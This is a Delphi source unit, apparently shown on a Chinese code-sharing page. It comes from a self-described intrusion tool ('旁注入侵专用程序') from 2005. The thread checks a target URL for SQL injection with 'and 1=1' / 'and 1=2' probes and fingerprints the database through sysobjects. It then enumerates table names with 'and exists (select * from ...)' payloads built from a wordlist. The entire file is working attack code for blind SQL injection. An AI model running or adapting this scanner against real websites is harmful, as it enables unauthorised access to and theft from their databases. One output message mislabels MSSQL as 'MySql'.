📄 scantable.pas
字号:
{##########################################
旁注入侵专用程序 3.0升级版
----------------------------------------
模块:SQL注入检测 - 检测表名
描述:该单元为检测表名的线程单元
作者:2005.3.20日下午 明小子
##########################################}
unit ScanTable;
interface
uses
Classes, GetHttpSize, SysUtils, StdCtrls, CheckLst, Dialogs;
type
MyScanTable = class(TThread)
private
SqlURL: TComboBox;
SqlLog, SqlResultMem: TMemo;
SqlChkTable: TCheckListBox;
and1, and2, SqlDataType, ifor: integer;
AddTable: TListBox;
procedure ShowAnd1;
procedure ShowAnd2;
procedure ShowStr;
procedure ShowStr2;
protected
procedure Execute; override;
public
constructor Create(Url: TComboBox; Log, SqlResult: TMemo; ChkTable: TCheckListBox; Table: TListBox);
end;
implementation
uses MainUnit;
constructor MyScanTable.Create(Url: TComboBox; Log, SqlResult: TMemo; ChkTable: TCheckListBox; Table: TListBox);
begin
SqlURL := Url;
SqlLog := Log;
SqlResultMem := SqlResult;
SqlChkTable := ChkTable;
AddTable := Table;
FreeonTerminate := True;
inherited Create(False);
end;
procedure MyScanTable.ShowAnd1;
begin
try
SqlLog.Lines.Add(Trim(SqlURL.Text) + ' and 1=1');
except
showmessage('MyScanTable.ShowAnd1');
end;
end;
procedure MyScanTable.ShowAnd2;
begin
try
SqlLog.Lines.Add(Trim(SqlURL.Text) + ' and 1=2');
except
showmessage('MyScanTable.ShowAnd2');
end;
end;
procedure MyScanTable.ShowStr;
begin
try
if and1 > and2 then
begin
MainForm.and1Num := and1;
SqlResultMem.Lines.Add('恭喜,该URL可以注入!');
MainForm.sql_EdUrl.Enabled := False;
SqlDataType := Get_HttpSize(Trim(SqlURL.Text) + '%20and%20exists%20(select%20*%20from%20sysobjects)', 1000);
if SqlDataType >= and1 then
begin
MainForm.RadMSSql.Checked := True;
SqlResultMem.Lines.Add('数据库类型:MySql数据库');
end
else
begin
MainForm.RadAccess.Checked := True;
SqlResultMem.Lines.Add('数据库类型:Access数据库');
end;
end
else
begin
MainForm.sql_EdUrl.Enabled := True;
MainForm.FieldNameLst.Enabled := True;
MainForm.Sql_GuessField.Enabled := True;
MainForm.Sql_GuessCon.Enabled := True;
SqlResultMem.Lines.Add('检测失败,该URL不可以进行注入!');
end;
except
showmessage('MyScanTable.ShowStr');
end;
end;
procedure MyScanTable.ShowStr2;
begin
try
MainForm.Gauge1.Progress := ifor;
SqlLog.Lines.Add(SqlUrl.text + ' and exists (select * from ' + SqlChkTable.Items[ifor] + ')');
and2 := Get_HttpSize(SqlURL.text + '%20and%20exists%20(select%20*%20from%20' + SqlChkTable.Items[ifor] + ')', 300);
if and2 >= and1 then
begin
AddTable.Items.Add(SqlChkTable.Items[ifor]);
MainForm.RzGroupBox4.Caption := '表名:' + inttostr(AddTable.Items.Count) + '个';
AddTable.Refresh;
end;
except
showmessage('MyScanTable.ShowStr2');
end;
end;
procedure MyScanTable.Execute;
var
i: integer;
begin
try
and1 := Get_HttpSize(Trim(SqlURL.Text) + '%20and%201=1');
Synchronize(ShowAnd1);
and2 := Get_HttpSize(Trim(SqlURL.Text) + '%20and%201=2');
Synchronize(ShowAnd2);
Synchronize(ShowStr);
if not (and1 > and2) then
begin
MainForm.ShowTableBool := False;
Exit;
end;
for i := 0 to SqlChkTable.Items.Count - 1 do
begin
if Terminated then Exit;
if SqlChkTable.Checked[i] then
begin
ifor := i;
Synchronize(ShowStr2);
end;
sleep(20);
end;
except
showmessage(' for - ScanTable_Error');
end;
end;
end.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -